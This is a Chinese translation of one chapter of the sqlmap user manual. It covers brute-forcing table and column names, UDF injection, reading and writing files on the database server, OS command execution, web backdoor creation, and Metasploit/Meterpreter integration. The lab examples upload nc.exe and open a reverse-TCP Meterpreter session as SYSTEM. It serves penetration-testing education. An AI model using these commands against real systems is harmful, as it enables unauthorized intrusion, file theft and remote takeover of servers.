sqlmap用户手册（七）——爆破等

爆破

---

暴力破解表名

参数：--common-tables

当使用--tables无法获取到数据库的表时，可以使用此参数。

通常是如下情况：

1、MySQL数据库版本小于5.0，没有information_schema表。2、数据库是Microssoft Access，系统表MSysObjects是不可读的（默认）。3、当前用户没有权限读取系统中保存数据结构的表的权限。

暴力破解的表在txt/common-tables.txt文件中，你可以自己添加。

列举一个MySQL 4.1的例子：

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner[...][hh:mm:39] [INFO] testing MySQL[hh:mm:39] [INFO] confirming MySQL[hh:mm:40] [INFO] the back-end DBMS is MySQL[hh:mm:40] [INFO] fetching bannerweb server operating system: Windowsweb application technology: PHP 5.3.1, Apache 2.2.14back-end DBMS operating system: Windowsback-end DBMS: MySQL < 5.0.0banner:    '4.1.21-community-nt'[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'[hh:mm:40] [INFO] adding words used on web page to the check listplease enter number of threads? [Enter for 1 (current)] 8[hh:mm:43] [INFO] retrieved: usersDatabase: testdb[1 table]+-------+| users |+-------+

暴力破解列名

参数：--common-columns

与暴力破解表名一样，暴力跑的列名在txt/common-columns.txt中。

用户自定义函数注入

---

参数：--udf-inject,--shared-lib

你可以通过编译MySQL注入你自定义的函数（UDFs）或PostgreSQL在windows中共享库，DLL，或者Linux/Unix中共享对象，sqlmap将会问你一些问题，上传到服务器数据库自定义函数，然后根据你的选择执行他们，当你注入完成后，sqlmap将会移除它们。

系统文件操作

---

从数据库服务器中读取文件

参数：--file-read

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。

列举一个Microsoft SQL Server 2005的例子：

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \--file-read "C:/example.exe" -v 1[...][hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2000web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[hh:mm:50] [INFO] fetching file: 'C:/example.exe'[hh:mm:50] [INFO] the SQL query provided returns 3 entriesC:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/C__example.exe'[...]$ ls -l output/192.168.136.129/files/C__example.exe -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe$ file output/192.168.136.129/files/C__example.exe output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel80386 32-bit

把文件上传到数据库服务器中

参数：--file-write,--file-dest

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。

列举一个MySQL的例子：

$ file /software/nc.exe.packed /software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit$ ls -l /software/nc.exe.packed-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1[...][hh:mm:29] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or 2008web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: MySQL >= 5.0.0[...]do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y[hh:mm:52] [INFO] retrieved: 31744[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, same size as the local file '/software/nc.exe.packed'

运行任意操作系统命令

参数：--os-cmd,--os-shell

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。

在MySQL、PostgreSQL，sqlmap上传一个二进制库，包含用户自定义的函数，sys_exec()和sys_eval()。

那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server，sqlmap将会使用xp_cmdshell存储过程，如果被禁（在Microsoft SQL Server 2005及以上版本默认禁制），sqlmap会重新启用它，如果不存在，会自动创建。

列举一个PostgreSQL的例子：

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \--os-cmd id -v 1[...]web application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: PostgreSQL[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system[hh:mm:12] [INFO] the back-end DBMS operating system is Linux[hh:mm:12] [INFO] testing if current user is DBA[hh:mm:12] [INFO] detecting back-end DBMS version from its banner[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF filedo you want to retrieve the command standard output? [Y/n/a] ycommand standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)'[hh:mm:19] [INFO] cleaning up the database management systemdo you want to remove UDF 'sys_eval'? [Y/n] ydo you want to remove UDF 'sys_exec'? [Y/n] y[hh:mm:23] [INFO] database management system cleanup finished[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

用--os-shell参数也可以模拟一个真实的shell，可以输入你想执行的命令。

当不能执行多语句的时候（比如php或者asp的后端数据库为MySQL时），仍然可能使用INTO OUTFILE写进可写目录，来创建一个web后门。支持的语言：

1、ASP2、ASP.NET3、JSP4、PHP

Meterpreter配合使用

参数：--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数，可以在数据库与攻击者直接建立TCP连接，这个连接可以是一个交互式命令行的Meterpreter会话，sqlmap根据Metasploit生成shellcode，并有四种方式执行它：

1、通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode，支持MySQL和PostgreSQL数据库，参数：--os-pwn。2、通过用户自定义的函数上传一个独立的payload执行，MySQL和PostgreSQL的sys_exec()函数，Microsoft SQL Server的xp_cmdshell()函数，参数：--os-pwn。3、通过SMB攻击(MS08-068)来执行Metasploit的shellcode，当sqlmap获取到的权限足够高的时候（Linux/Unix的uid=0，Windows是Administrator），--os-smbrelay。4、通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004)，在内存中执行Metasploit的payload，参数：--os-bof

列举一个MySQL例子：

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit[...][hh:mm:31] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system[hh:mm:31] [INFO] the back-end DBMS operating system is Windowshow do you want to establish the tunnel?[1] TCP: Metasploit Framework (default)[2] ICMP: icmpsh - ICMP tunneling> [hh:mm:32] [INFO] testing if current user is DBA[hh:mm:32] [INFO] fetching current userwhat is the back-end database management system architecture?[1] 32-bit (default)[2] 64-bit> [hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist[hh:mm:33] [INFO] detecting back-end DBMS version from its banner[hh:mm:33] [INFO] retrieving MySQL base directory absolute path[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF filehow do you want to execute the Metasploit shellcode on the back-end database underlying operating system?[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)[2] Stand-alone payload stager (file system way)> [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use?[1] Reverse TCP: Connect back from the database host to this machine (default)[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535[3] Bind TCP: Listen on the database host for a connection> which is the local address? [192.168.136.1] which local port number do you want to use? [60641] which payload do you want to use?[1] Meterpreter (default)[2] Shell[3] VNC> [hh:mm:40] [INFO] creation in progress ... done[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..                                _                                | |      o_  _  _    _ _|_  __,   ,    _  | |  __    _|_/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  ||  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/                        /|                        \|    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]+ -- --=[ 674 exploits - 351 auxiliary+ -- --=[ 217 payloads - 27 encoders - 8 nops    =[ svn r12272 updated 4 days ago (2011.04.07)PAYLOAD => windows/meterpreter/reverse_tcpEXITFUNC => threadLPORT => 60641LHOST => 192.168.136.1[*] Started reverse handler on 192.168.136.1:60641 [*] Starting the payload handler...[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..[*] Sending stage (749056 bytes) to 192.168.136.129[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011meterpreter > Loading extension espia...success.meterpreter > Loading extension incognito...success.meterpreter > [-] The 'priv' extension has already been loaded.meterpreter > Loading extension sniffer...success.meterpreter > System Language : en_USOS              : Windows .NET Server (Build 3790, Service Pack 2).Computer        : W2K3R2Architecture    : x86Meterpreter     : x86/win32meterpreter > Server username: NT AUTHORITY\SYSTEMmeterpreter > ipconfigMS TCP Loopback interfaceHardware MAC: 00:00:00:00:00:00IP Address  : 127.0.0.1Netmask     : 255.0.0.0Intel(R) PRO/1000 MT Network ConnectionHardware MAC: 00:0c:29:fc:79:39IP Address  : 192.168.136.129Netmask     : 255.255.255.0meterpreter > exit[*] Meterpreter session 1 closed.  Reason: User exit

默认情况下MySQL在Windows上以SYSTEM权限运行，PostgreSQL在Windows与Linux中是低权限运行，Microsoft SQL Server 2000默认是以SYSTEM权限运行，Microsoft SQL Server 2005与2008大部分是以NETWORK SERVICE有时是LOCAL SERVICE。